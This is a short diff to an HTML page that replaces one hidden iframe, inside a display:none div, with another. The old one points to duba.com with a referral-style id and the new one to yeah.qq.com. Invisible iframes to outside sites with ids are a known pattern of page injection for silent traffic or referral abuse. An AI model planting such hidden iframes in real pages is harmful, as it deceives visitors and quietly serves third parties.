--- a/index.html
+++ b/index.html
@@ -5,6 +5,6 @@
 </head>
 <body>
   <div style="display:none;inline">
-  <iframe height="100" width=100% src="https://www.duba.com/?un_454974_157686"></iframe>
+  <iframe height="100" width=100% src="https://yeah.qq.com/?q=157686"></iframe>
   </div>
 </body></html>
